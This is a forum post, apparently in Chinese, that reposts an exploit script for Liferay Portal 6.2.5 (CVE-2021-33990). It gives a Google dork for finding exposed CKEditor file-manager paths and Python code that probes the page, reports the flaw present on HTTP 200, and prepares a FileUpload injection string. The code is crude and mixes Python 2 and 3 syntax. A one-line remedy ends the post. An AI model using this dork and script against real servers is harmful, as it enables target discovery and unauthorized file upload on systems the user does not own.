发布于3月5日3月5日 Members # Exploit Title: Liferay Portal 6.2.5 - Insecure Permissions # Google Dork: -inurl:/html/js/editor/ckeditor/editor/filemanager/browser/ # Date: 2021/05 # Exploit Author: fu2x2000 # Version: Liferay Portal 6.2.5 or later # CVE : CVE-2021-33990 import requests import json print (" Search this on Google #Dork for liferay -inurl:/html/js/editor/ckeditor/editor/filemanager/browser/") url ="URL Goes Here /html/js/editor/ckeditor/editor/filemanager/browser/liferay/frmfolders.html" req = requests.get(url) print req sta = req.status_code if sta == 200: print ('Life Vulnerability exists') cook = url print cook inject = "Command=FileUpload&Type=File&CurrentFolder=/" #cook_inject = cook+inject #print cook_inject else: print ('not found try a another method') print ("solution restrict access and user groups")
参与讨论
你可立刻发布并稍后注册。 如果你有帐户,立刻登录发布帖子。
注意:你的帖子需要版主批准后才能看到。